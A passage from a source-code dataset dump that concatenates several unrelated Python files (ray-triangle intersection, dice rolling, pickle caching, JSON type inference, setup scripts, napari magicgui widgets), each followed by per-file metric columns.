self.break_function() | 35.259259 | 63 | 0.590336 | 113 | 952 | 4.743363 | 0.265487 | 0.143657 | 0.16791 | 0.078358 | 0.25 | 0.141791 | 0.141791 | 0 | 0 | 0 | 0 | 0.00744 | 0.294118 | 952 | 27 | 64 | 35.259259 | 0.790179 | 0 | 0 | 0.208333 | 0 | 0 | 0.032529 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0 | 0.291667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e8bc66edbc27feb19c1a24e01f7065d5f4aedb0 | 4,646 | py | Python | mesh_vertex_color/np_ray_triangle_intersection.py | naysok/Mesh_Vertex_Color | c6fafe480957305176ac1adc14c093d9278baa94 | [
"MIT"
] | 1 | 2020-09-17T16:41:34.000Z | 2020-09-17T16:41:34.000Z | mesh_vertex_color/np_ray_triangle_intersection.py | naysok/Mesh_Vertex_Color | c6fafe480957305176ac1adc14c093d9278baa94 | [
"MIT"
] | null | null | null | mesh_vertex_color/np_ray_triangle_intersection.py | naysok/Mesh_Vertex_Color | c6fafe480957305176ac1adc14c093d9278baa94 | [
"MIT"
] | null | null | null | import sys
import numpy as np
#############################################################
### ###
### Module for Python3 ###
### * Using Numpy ( + Cupy ? ) ###
### ###
#############################################################
class RayTriangleIntersection():
### https://pheema.hatenablog.jp/entry/ray-triangle-intersection
def __init__(self):
pass
def calc_intersection(self, o, d, v0, v1, v2):
e1 = np.subtract(v1, v0)
e2 = np.subtract(v2, v0)
### https://www.it-swarm.dev/ja/python/python-numpy-machine-epsilon/1041749812/
kEpsilon = np.finfo(float).eps
alpha = np.cross(d, e2)
# det = np.dot(e1, alpha)
det = np.sum(e1 * alpha, axis=1)
# print("e1.shape : {}".format(e1.shape))
# print("e2.shape : {}".format(e2.shape))
# print("alpha.shape : {}".format(alpha.shape))
# print("det.shape : {}".format(det.shape))
# intersect_count = np.count_nonzero(det)
### True = InterSection
### (1) Check Parallel
bool_p = (-kEpsilon > det) | (det > kEpsilon)
### Remove (1)
v0 = v0[bool_p]
v1 = v1[bool_p]
v2 = v2[bool_p]
e1 = e1[bool_p]
e2 = e2[bool_p]
alpha = alpha[bool_p]
det = det[bool_p]
# print("det.shape (1) : {}".format(det.shape))
det_inv = 1.0 / det
r = np.subtract(o, v0)
### (2) Check u-Value in the Domain (0 <= u <= 1)
# u = np.dot(alpha, r) * det_inv
u = np.sum(alpha * r, axis=1) * det_inv
bool_u = (0.0 < u) & (u < 1.0)
### Remove (2)
v0 = v0[bool_u]
v1 = v1[bool_u]
v2 = v2[bool_u]
e1 = e1[bool_u]
e2 = e2[bool_u]
alpha = alpha[bool_u]
r = r[bool_u]
u = u[bool_u]
det = det[bool_u]
det_inv = det_inv[bool_u]
# print("det.shape (2) : {}".format(det.shape))
beta = np.cross(r, e1)
### (3) Check v-Value in the Domain (0 <= v <= 1)
### and
### Check (u + v = 1)
# v = np.dot(d, beta) * det_inv
v = np.sum(d * beta, axis=1) * det_inv
bool_v = (0.0 < v) & (u + v < 1.0)
### Remove (3)
v0 = v0[bool_v]
v1 = v1[bool_v]
v2 = v2[bool_v]
e1 = e1[bool_v]
e2 = e2[bool_v]
alpha = alpha[bool_v]
beta = beta[bool_v]
r = r[bool_v]
u = u[bool_v]
v = v[bool_v]
det = det[bool_v]
det_inv = det_inv[bool_v]
# print("det.shape (3) : {}".format(det.shape))
### (4) Check t_value (t >= 0)
# t = np.dot(e2, beta) * det_inv
t = np.sum(e2 * beta, axis=1) * det_inv
bool_t = 0.0 < t
### Remove (4)
v0 = v0[bool_t]
v1 = v1[bool_t]
v2 = v2[bool_t]
e1 = e1[bool_t]
e2 = e2[bool_t]
alpha = alpha[bool_t]
beta = beta[bool_t]
r = r[bool_t]
t = t[bool_t]
u = u[bool_t]
v = v[bool_t]
det = det[bool_t]
det_inv = det_inv[bool_t]
# print("det.shape (4) : {}".format(det.shape))
### Intersett : True !!
# intersect_val = [t, u, v]
### Barycenrinc_Coordinate >> XYZ
### ((1 - u - v) * v0) + (u * v1) + (v * v2)
new_amp = 1.0 - u - v
new_v0 = np.multiply(v0, new_amp[:, np.newaxis])
new_v1 = np.multiply(v1, u[:, np.newaxis])
new_v2 = np.multiply(v2, v[:, np.newaxis])
intersect_pos = np.add(np.add(new_v0, new_v1), new_v2)
ray_line = np.subtract(intersect_pos, o)
# print("ray_line.shape : {}".format(ray_line.shape))
### (5) Check Line-Triangle Intersection
### Compare Length, Line-Length / Origin-IntersectPoint-Length
line_length = np.linalg.norm(d)
intersect_length = np.linalg.norm(ray_line, axis=1)
# print("line_len : {}".format(line_length))
# print("inter_len : {}".format(intersect_length))
# print("inter_len.shape : {}".format(intersect_length.shape))
bool_l = intersect_length < line_length
# print(bool_l)
intersect_count = np.count_nonzero(bool_l)
return intersect_count | 30.168831 | 88 | 0.44619 | 588 | 4,646 | 3.357143 | 0.17517 | 0.035461 | 0.030395 | 0.016717 | 0.096758 | 0.01925 | 0 | 0 | 0 | 0 | 0 | 0.042479 | 0.381834 | 4,646 | 154 | 89 | 30.168831 | 0.644847 | 0.314895 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027027 | false | 0.013514 | 0.027027 | 0 | 0.081081 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e8c088d3edb685bf729a71250bfe8e5e7bfb65d | 2,046 | py | Python | src/dungeonbot/plugins/helpers/die_roll.py | tlake/dungeonbot_backup | 715c14d3a06d8a7a8771572371b67cc87c7e17fb | [
"MIT"
] | null | null | null | src/dungeonbot/plugins/helpers/die_roll.py | tlake/dungeonbot_backup | 715c14d3a06d8a7a8771572371b67cc87c7e17fb | [
"MIT"
] | null | null | null | src/dungeonbot/plugins/helpers/die_roll.py | tlake/dungeonbot_backup | 715c14d3a06d8a7a8771572371b67cc87c7e17fb | [
"MIT"
] | null | null | null | class DieRoll(object):
"""Roll object that parses roll string and calls appropriate function."""
def __init__(self, roll_str, flag):
"""Initialize Die roll object by breaking apart roll string."""
valid_flags = {
"a": self.advantage,
"d": self.disadvantage
}
self.roll_str = roll = roll_str
self.operator = "+"
self.action = valid_flags[flag] if flag else self.roll_die
self.modifier = 0
self.message = ""
valid_operators = ["+", "-"]
for o in valid_operators:
if o in roll:
self.operator = o
roll, mod = roll.split(o)
self.modifier = int(mod) * -1 if o == "-" else int(mod)
self.number, self.sides = map(int, roll.split("d"))
self.min_roll = self.number
self.max_roll = self.sides * self.number
def print_results(self, roll_result, name=None):
"""Return result of roll."""
roll_plus_mods = "{} {} {}".format(
roll_result,
self.operator,
abs(self.modifier)
)
final_result = "*[ {} ]* _({} = {}) (min {}, max {}) {}_".format(
roll_result + self.modifier,
self.roll_str,
roll_plus_mods,
self.min_roll + self.modifier,
self.max_roll + self.modifier,
self.message
)
if name:
final_result += " with {}".format(name)
return final_result
def roll_die(self):
"""Standard roll of die."""
import random
result = 0
for x in range(0, self.number):
result += random.randint(1, self.sides)
return result
def advantage(self):
"""Roll with advantage."""
self.message = "with advantage"
return max(self.roll_die(), self.roll_die())
def disadvantage(self):
"""Roll with disadvantage."""
self.message = "with disadvantage"
return min(self.roll_die(), self.roll_die())
| 31.476923 | 77 | 0.535679 | 233 | 2,046 | 4.553648 | 0.283262 | 0.082941 | 0.051838 | 0.042413 | 0.04147 | 0.04147 | 0 | 0 | 0 | 0 | 0 | 0.003693 | 0.338221 | 2,046 | 64 | 78 | 31.96875 | 0.779911 | 0.105083 | 0 | 0 | 0 | 0 | 0.052222 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.102041 | false | 0 | 0.020408 | 0 | 0.22449 | 0.020408 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e8d954a7e320b872b94573d4e171b827ee4d202 | 1,099 | py | Python | src/utils/load_or_make.py | jlehnersd/metis_project2 | 0bde762c43c4cf9aa5c6672b894e704803616aa3 | [
"MIT"
] | 16 | 2019-04-08T22:09:51.000Z | 2021-08-02T18:18:41.000Z | src/utils/load_or_make.py | jlehnersd/metis_project2 | 0bde762c43c4cf9aa5c6672b894e704803616aa3 | [
"MIT"
] | 1 | 2019-11-19T06:27:37.000Z | 2019-12-26T20:56:03.000Z | src/utils/load_or_make.py | floraxinru/metisproject04 | 80ee97eedbf675d6f5064eb92fd7166b56bb81e6 | [
"MIT"
] | 8 | 2019-04-08T23:01:39.000Z | 2021-08-02T18:18:43.000Z |
import os, pickle
import functools
def load_or_make(creator):
"""
Loads data that is pickled at filepath if filepath exists;
otherwise, calls creator(*args, **kwargs) to create the data
and pickle it at filepath.
Returns the data in either case.
Inputs:
- filepath: path to where data is / should be stored
- creator: function to create data if it is not already pickled
- *args, **kwargs: arguments passed to creator()
Outputs:
- item: the data that is stored at filepath
Usage:
@load_or_make
def data_creator(args):
# code
# return data
my_data = data_creator(save_file_path, *args, **kwargs)
"""
@functools.wraps(creator)
def cached_creator(filepath, *args, **kwargs):
if os.path.isfile(filepath):
with open(filepath, 'rb') as pkl:
item = pickle.load(pkl)
else:
item = creator(*args, **kwargs)
with open(filepath, 'wb') as pkl:
pickle.dump(item, pkl)
return item
return cached_creator
| 28.179487 | 67 | 0.606915 | 140 | 1,099 | 4.685714 | 0.435714 | 0.07622 | 0.030488 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.304823 | 1,099 | 38 | 68 | 28.921053 | 0.858639 | 0.495905 | 0 | 0 | 0 | 0 | 0.008677 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.142857 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e8f2cd4383b58674dc6f3bff361444a5618a257 | 13,075 | py | Python | ir.py | safx/nu-scraper | 6b18d9f4937bd2a1cd5b89b141868e1ae60a5a4e | [
"MIT"
] | 3 | 2021-02-05T08:30:40.000Z | 2021-02-05T11:33:16.000Z | ir.py | safx/nu-scraper | 6b18d9f4937bd2a1cd5b89b141868e1ae60a5a4e | [
"MIT"
] | null | null | null | ir.py | safx/nu-scraper | 6b18d9f4937bd2a1cd5b89b141868e1ae60a5a4e | [
"MIT"
] | null | null | null | from os import replace
from typing import List, Dict, Any, Callable
import os
import re
import json
import functools
ST_UNKNOWN = "*"
ST_BOOL = "bool"
ST_INT = "integer"
ST_STR = "string"
ST_FLOAT = "float"
ST_URL = "url"
ST_DATETIME = "datetime"
REGEXP_URL = re.compile('^https?://.+$')
REGEXP_DATE = re.compile('^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z$')
class TypeBase:
@property
def isLeaf(self) -> bool:
return True
class NullType(TypeBase):
def __repr__(self) -> str:
return 'null'
class UniTypeHolder(TypeBase):
def __init__(self, vtype: TypeBase) -> None:
assert(type(vtype) != NullType)
self._type = vtype
@property
def type(self) -> TypeBase:
return self._type
def replaceWithCommonObject(self, commonObject: 'CommonObjectType'):
self._type = commonObject
@property
def isLeaf(self) -> bool:
if self._type is None:
return False
return self._type.isLeaf
class Nullable(UniTypeHolder):
def __repr__(self) -> str:
return str(self._type) + '?'
class ValueType(TypeBase):
def __init__(self, typename: str) -> None:
assert(type(typename) == str)
self.__typename = typename
def __eq__(self, other):
return type(other) == ValueType and self.__typename == other.__typename
def __repr__(self) -> str:
return '"' + self.__typename + '"'
@property
def typename(self):
return self.__typename
class ArrayType(UniTypeHolder):
def __repr__(self) -> str:
return '[' + str(self._type) + ']' if self._type is not None else '[]'
class ObjectType(TypeBase):
def __init__(self, props) -> None:
assert(type(props) == dict)
self.__props = props
@property
def isLeaf(self) -> bool:
return False
@property
def isPlain(self):
return all(map(lambda e: e.isLeaf, self.__props.values()))
def get(self, v):
return self.__props.get(v, None)
def keys(self):
return self.__props.keys()
def items(self):
return self.__props.items()
def __repr__(self) -> str:
return '{' + ','.join(['"%s":%s' % (k,str(v)) for (k,v) in self.__props.items()]) + '}'
@property
def numOfKeys(self):
return len(list(self.keys()))
def hasSameKeysOf(self, other) -> bool:
assert(type(other) == ObjectType)
return set(self.keys()) == set(other.keys())
def containsAllKeysOf(self, other) -> bool:
assert(type(other) == ObjectType)
return set(self.keys()).issuperset(set(other.keys()))
def replaceWithCommonObject(self, key, commonObject: 'CommonObjectType'):
self.__props[key] = commonObject
class CommonObjectType(TypeBase):
def __init__(self, typename, object: ObjectType) -> None:
assert(type(object) == ObjectType)
self.__typename = typename
self.__object = object
def __repr__(self) -> str:
return '"$' + self.__typename + '"'
@property
def typename(self):
return self.__typename
@property
def object(self):
return self.__object
def __guessTypeForValue(v):
assert(type(v) != dict and type(v) != list)
if type(v) == type(None): return NullType()
typemap = {
bool: ST_BOOL,
int: ST_INT,
str: ST_STR,
float: ST_FLOAT
}
vtype = typemap.get(type(v), NullType())
if type(vtype) == NullType:
return NullType()
if vtype == ST_STR:
if v.find('http://') == 0 or v.find('https://') == 0:
if v.find('{') == -1: # FIXME ???
return ValueType(ST_URL)
if REGEXP_DATE.match(v):
return ValueType(ST_DATETIME)
return ValueType(vtype)
def __guessTypeForArray(json) -> ArrayType:
assert(type(json) == list)
def aggregateArrayOfObjectType(array):
keys = functools.reduce(lambda a, e: a.union(set(e.keys())), array, set())
if len(keys) == 0:
return ArrayType(None)
merged = {}
for obj in array:
for key in keys:
value = obj.get(key)
if type(value) == ObjectType:
merged[key] = value
#elif type(value) == ArrayType:
# merged[key] = aggregateArrayOfObjectType(value)
elif key in merged:
if type(merged[key]) == NullType and type(value) == NullType:
pass
elif type(merged[key]) == ObjectType and type(value) == NullType:
merged[key] = Nullable(merged[key])
elif type(merged[key]) == NullType and type(value) == ObjectType:
merged[key] = Nullable(value)
elif type(merged[key]) == type(value) and type(value) == ValueType and merged[key] == value:
pass
else:
pass
#merged[key] = merged[key].union(value)
else:
merged[key] = value
return ArrayType(ObjectType(merged))
if all([type(i) == dict for i in json]):
arr = [__guessTypeForDict(i) for i in json]
return aggregateArrayOfObjectType(arr)
types = functools.reduce(lambda a, e: a.union(set([type(e)])), json, set())
if len(types) == 1:
return ArrayType(__guessTypeForValue(json[0]))
assert(False)
def __guessTypeForDict(json) -> ObjectType:
assert(type(json) == dict)
return ObjectType({k:guessType(v) for (k,v) in json.items()})
def guessType(value) -> TypeBase:
if type(value) == dict:
return __guessTypeForDict(value)
elif type(value) == list:
return __guessTypeForArray(value)
else:
return __guessTypeForValue(value)
def collectNonNestedObjects(obj: TypeBase, path: str = '', collected_map: Dict[str, TypeBase] = dict()) -> Dict[str, TypeBase]:
if obj.isLeaf:
return collected_map
if obj.isPlain:
collected_map[path] = obj
return collected_map
assert(type(obj) == ObjectType)
for key, value in obj.items():
if type(value) == Nullable and type(value.type) == ObjectType:
collectNonNestedObjects(value.type, path + '/' + key + '?', collected_map)
elif type(value) == ObjectType:
collectNonNestedObjects(value, path + '/' + key, collected_map)
elif type(value) == ArrayType and type(value.type) == ObjectType:
collectNonNestedObjects(value.type, path + '/' + key + '/0', collected_map)
return collected_map
def exactMatch(a: ObjectType, b: ObjectType):
return a.numOfKeys > 0 and a.isPlain and a.hasSameKeysOf(b)
def similarMatch(a: ObjectType, b: ObjectType):
return a.numOfKeys > 0 and a.isPlain and a.containsAllKeysOf(b) and a.numOfKeys > 3
def bothMatch(a: ObjectType, b: ObjectType):
return exactMatch(a, b) or similarMatch(a, b)
class Endpoint:
def __init__(self, request: Dict, response: TypeBase, rawResponse: str) -> None:
self.__request = request
self.__response = response
self.__rawResponse = rawResponse
@property
def request(self):
return self.__request
@property
def response(self):
return self.__response
@property
def rawResponse(self):
return self.__rawResponse
def replaceWithCommonObject(self, commonObject: CommonObjectType):
cond = lambda v: bothMatch(commonObject.object, v)
def visitObject(obj: TypeBase):
if obj.isLeaf:
return 0
if type(obj) != ObjectType:
return 0
assert(type(obj) == ObjectType)
replaceCount = 0
for key, value in obj.items():
#print(' ', value)
if type(value) == ObjectType:
if cond(value):
replaceCount += 1
obj.replaceWithCommonObject(key, commonObject)
elif not value.isPlain:
replaceCount += visitObject(value)
elif type(value) == ArrayType and type(value.type) == ObjectType:
if cond(value.type):
replaceCount += 1
value.replaceWithCommonObject(commonObject)
else:
replaceCount += visitObject(value.type)
elif type(value) == Nullable and type(value.type) == ObjectType:
if cond(value.type):
replaceCount += 1
value.replaceWithCommonObject(commonObject)
else:
replaceCount += visitObject(value.type)
return replaceCount
#print('>>>>', self.__request['name'])
replaceCount = 0
if type(self.__response) == ObjectType and cond(self.__response):
replaceCount = 1
self.__response = commonObject
else:
replaceCount = visitObject(self.__response)
return replaceCount
def nonNextedResponseObjects(self) -> Dict[str, TypeBase]:
def resolveTypename(path):
n = [e for e in path.split('/') if not e.isdigit()][-1]
if len(n) == 0:
return self.__request['name'] + 'Response'
return n if n[-1] != '?' else n[:-1]
if self.__response is None:
return None
if type(self.__response) == ArrayType:
return None
d = collectNonNestedObjects(self.__response, '', dict())
return {resolveTypename(k):v for (k,v) in d.items() if len(v.keys()) > 0}
def __repr__(self) -> str:
return '%s = %s' % (self.__request['name'], self.__response)
class API:
def __init__(self, endpoints: List[Endpoint] = []) -> None:
self.__endpoints = endpoints
self.__commonObjects = []
def endpoints(self) -> List[Endpoint]:
return self.__endpoints
def commonObjects(self) -> List[CommonObjectType]:
return self.__commonObjects
def __resolveTypename(self, typenameCanditates: List[str]):
exists = lambda name: any(filter(lambda e: e.typename == name, self.__commonObjects))
def rename(name):
for i in range(26):
newTypename = name + chr(ord('A') + i) + 'xx'
if not exists(newTypename):
return newTypename
assert('Temporary typename exhausted' and False)
filteredTypenameCanditates = sorted([e for e in typenameCanditates if len(e) > 0], key=functools.cmp_to_key(lambda a,b:len(a) - len(b)))
typename = filteredTypenameCanditates[0]
cappedTypename = typename[0].upper() + typename[1:]
return rename(cappedTypename) if exists(cappedTypename) else cappedTypename
def findAndRegisterSimilarObjects(self):
def findSimilarObject(objects: List[ObjectType], matchFunction: Callable[[ObjectType, ObjectType], bool]) -> CommonObjectType:
for (_, obj) in objects:
if any(filter(lambda e: matchFunction(e.object, obj), self.__commonObjects)): continue
typenameCanditates = [n for (n,o) in objects if matchFunction(obj, o)]
if len(typenameCanditates) >= 2:
return CommonObjectType(self.__resolveTypename(typenameCanditates), obj)
return None
for i in range(100000):
#nonNestedObjects = functools.reduce(lambda a, e: a + list(e.nonNextedResponseObjects().items()), self.__endpoints, [])
nonNestedObjects = []
for e in self.__endpoints:
objs = e.nonNextedResponseObjects()
if objs is None:
continue
nonNestedObjects += objs.items()
sot = findSimilarObject(nonNestedObjects, exactMatch) or findSimilarObject(nonNestedObjects, similarMatch)
if sot is None:
break
self.__commonObjects.append(sot)
for e in self.__endpoints:
e.replaceWithCommonObject(sot)
@staticmethod
def initWithDir(dir: str, lang: str):
endpoints = []
#for d in ['get-message.json', 'get-messages.json']: #os.listdir(os.path.join(dir, 'api')):
path = os.path.join(dir, 'api', lang)
for d in os.listdir(path):
with open(os.path.join(path, d)) as req:
req_json = json.load(req)
res_text = None
res_json = None
try:
with open(os.path.join(dir, 'response', d)) as res:
res_text = ''.join(res.readlines())
res_json = json.loads(res_text)
except (OSError, IOError) as e:
pass # when reponse file doesn't exist
endpoint = Endpoint(req_json, guessType(res_json), res_text)
endpoints.append(endpoint)
return API(endpoints)
| 36.218837 | 144 | 0.578356 | 1,399 | 13,075 | 5.255897 | 0.137956 | 0.023256 | 0.015232 | 0.013328 | 0.241398 | 0.166191 | 0.148783 | 0.133823 | 0.120495 | 0.102543 | 0 | 0.004619 | 0.304551 | 13,075 | 360 | 145 | 36.319444 | 0.804025 | 0.032352 | 0 | 0.255814 | 0 | 0.003322 | 0.018195 | 0.003006 | 0 | 0 | 0 | 0.002778 | 0.043189 | 1 | 0.17608 | false | 0.013289 | 0.019934 | 0.089701 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e8fa3cd904b0121303ce6cd660e368b0933349e | 393 | py | Python | setup.py | RonenHoffer/grebot | a8ca01baba72ff13ad68706626c5fd51630bbdf1 | [
"MIT"
] | null | null | null | setup.py | RonenHoffer/grebot | a8ca01baba72ff13ad68706626c5fd51630bbdf1 | [
"MIT"
] | null | null | null | setup.py | RonenHoffer/grebot | a8ca01baba72ff13ad68706626c5fd51630bbdf1 | [
"MIT"
] | 1 | 2016-01-27T13:37:09.000Z | 2016-01-27T13:37:09.000Z | from setuptools import setup
from platform import system
SYSTEM = system()
VERSION = '1.0.2'
if SYSTEM == 'Windows':
scripts = ['grebot/grebot.bat']
else:
scripts = ['grebot/grebot.sh']
setup(
name='grebot',
version=VERSION,
packages=['grebot'],
license='MIT',
long_description=open('README.txt').read(),
scripts=scripts,
install_requires=['colorama']
)
| 18.714286 | 47 | 0.653944 | 46 | 393 | 5.543478 | 0.652174 | 0.094118 | 0.14902 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009375 | 0.185751 | 393 | 20 | 48 | 19.65 | 0.7875 | 0 | 0 | 0 | 0 | 0 | 0.198473 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.117647 | 0 | 0.117647 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e90005a1d37aeec86aa49ac6b0e7b616e3410f4 | 3,774 | py | Python | src/arcos_gui/magic_guis.py | bgraedel/arcos-gui | aaeeba3aae1bc9a23c635ebabf6309f878ad8a39 | [
"BSD-3-Clause"
] | 2 | 2022-02-22T14:24:38.000Z | 2022-02-26T13:33:25.000Z | src/arcos_gui/magic_guis.py | bgraedel/arcos-gui | aaeeba3aae1bc9a23c635ebabf6309f878ad8a39 | [
"BSD-3-Clause"
] | null | null | null | src/arcos_gui/magic_guis.py | bgraedel/arcos-gui | aaeeba3aae1bc9a23c635ebabf6309f878ad8a39 | [
"BSD-3-Clause"
] | null | null | null | import operator
from magicgui import magicgui
OPERATOR_DICTIONARY = {
"Divide": (operator.truediv, "Measurement_Ratio"),
"Multiply": (operator.mul, "Measurement_Product"),
"Add": (operator.add, "Measurement_Sum"),
"Subtract": (operator.sub, "Measurement_Difference"),
}
measurement_math_options = list(OPERATOR_DICTIONARY.keys())
measurement_math_options.append("None")
@magicgui(
call_button="Set Options",
position={
"choices": ["upper_right", "upper_left", "lower_right", "lower_left", "center"]
},
size={"min": 0, "max": 1000},
x_shift={"min": -1000, "max": 1000},
y_shift={"min": -1000, "max": 1000},
)
def timestamp_options(
start_time=0,
step_time=1,
prefix="T =",
suffix="frame",
position="upper_left",
size=12,
x_shift=12,
y_shift=0,
):
"""
Widget to choose timestamp options from when called
"""
timestamp_options.close()
# used as a callback function in main widget file
def show_timestamp_options():
timestamp_options.show()
@magicgui(
call_button=False,
Ok={"widget_type": "PushButton", "tooltip": "Press to load data"},
frame={
"choices": ["None"],
"label": "Frame Column:",
"tooltip": "Select frame column in input data",
},
track_id={
"choices": ["None"],
"label": "Object id Column:",
"tooltip": "Select column representing object track ids in input data", # noqa: E501
},
x_coordinates={
"choices": ["None"],
"label": "X Coordinate Column:",
"tooltip": "Select x coordinate column in input data",
},
y_coordinates={
"choices": ["None"],
"label": "Y Coordinate Column:",
"tooltip": "Select y coordinate column in input data",
},
z_coordinates={
"choices": ["None"],
"label": "Z Coordinate Column:",
"tooltip": "Select z coordinate column in input data, select None if column does not exist", # noqa: E501
},
measurment={
"choices": ["None"],
"label": "Measurement Column:",
"tooltip": "Select measurement column in input data",
},
field_of_view_id={
"choices": ["None"],
"label": "Field of View/Position Column:",
"tooltip": "Select fov column in input data, select None if column does not exist", # noqa: E501
},
additional_filter={
"choices": ["None"],
"label": "Additional Filter Column:",
"tooltip": "Select additional filter column, for example Well of a wellplate, select None if column does not exist", # noqa: E501
},
second_measurment={
"choices": ["None"],
"label": "Second Measurement Column:",
"visible": False,
"tooltip": "Select second measurement",
},
measurement_math={
"widget_type": "RadioButtons",
"orientation": "horizontal",
"choices": measurement_math_options,
"label": "Math on first and \n second measurement:",
"tooltip": "Choose operation to calculate the measurment to be used in arcos calculation on first and second measurement", # noqa: E501
},
)
def columnpicker(
frame="None",
track_id="None",
x_coordinates="None",
y_coordinates="None",
z_coordinates="None",
measurment="None",
second_measurment="None",
field_of_view_id="None",
additional_filter="None",
measurement_math="None",
Ok=False,
):
"""Dialog with magicgui for selecting columns"""
columnpicker.Ok.bind(not Ok)
def toggle_visible_second_measurment():
curr_value = columnpicker.measurement_math.value
if curr_value in ["None", "1/X"]:
columnpicker.second_measurment.hide()
else:
columnpicker.second_measurment.show()
| 29.952381 | 144 | 0.621092 | 421 | 3,774 | 5.425178 | 0.308789 | 0.043345 | 0.063047 | 0.044658 | 0.109457 | 0.064799 | 0.064799 | 0.064799 | 0.064799 | 0.048161 | 0 | 0.015267 | 0.236354 | 3,774 | 125 | 145 | 30.192 | 0.777238 | 0.052464 | 0 | 0.119266 | 0 | 0 | 0.392958 | 0.006197 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036697 | false | 0 | 0.018349 | 0 | 0.055046 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e91dfb90c4fe4bfe8c34531aaadba87573629d2 | 980 | py | Python | setup.py | michaelremington2/uumarrty | 4c48b496e09429eb6777f9dececa7c7be203cc8c | [
"BSD-3-Clause"
] | null | null | null | setup.py | michaelremington2/uumarrty | 4c48b496e09429eb6777f9dececa7c7be203cc8c | [
"BSD-3-Clause"
] | null | null | null | setup.py | michaelremington2/uumarrty | 4c48b496e09429eb6777f9dececa7c7be203cc8c | [
"BSD-3-Clause"
] | null | null | null | #! /usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name='uumarrty',
version='0.0.1',
url='https://github.com/michaelremington2/uumarrty',
author='Michael Remington and Jeet Sukumaran',
author_email='michaelremington2@gmail.com',
license="LICENSE.txt",
classifiers=[
"Intended Audience :: Science/Research",
"License :: OSI Approved :: BSD License",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
],
scripts=[
"bin/simulate_uumarrty.py",
],
test_suite = "tests",
package_dir={"": "src"},
description="Agent based simulation of predator prey dynamics.",
long_description=long_description,
long_description_content_type="text/markdown",
packages=find_packages(where="src"),
python_requires=">=3.6",
) | 28.823529 | 68 | 0.656122 | 110 | 980 | 5.727273 | 0.754545 | 0.095238 | 0.060317 | 0.095238 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011392 | 0.193878 | 980 | 34 | 69 | 28.823529 | 0.786076 | 0.043878 | 0 | 0.071429 | 0 | 0 | 0.443376 | 0.054487 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.035714 | 0 | 0.035714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8e948cdbd864ca7d68940aa639d8604501f00bc5 | 683 | py | Python | RackPi/Pages/Reboot.py | DarkIrata/rackpi | e588f9b42ae55c8a763ce9e7a953e29f25e696b3 | [
"MIT"
] | null | null | null | RackPi/Pages/Reboot.py | DarkIrata/rackpi | e588f9b42ae55c8a763ce9e7a953e29f25e696b3 | [
"MIT"
] | null | null | null | RackPi/Pages/Reboot.py | DarkIrata/rackpi | e588f9b42ae55c8a763ce9e7a953e29f25e696b3 | [
"MIT"
] | null | null | null | from Data.Drawer import Drawer
from Data.Helper import *
from Pages.PageBase import PageBase
class Reboot(PageBase):
def __init__(self, drawer: Drawer):
PageBase.__init__(self, drawer)
def UpdateCanvas(self):
if not self.CanUpdate(100):
return
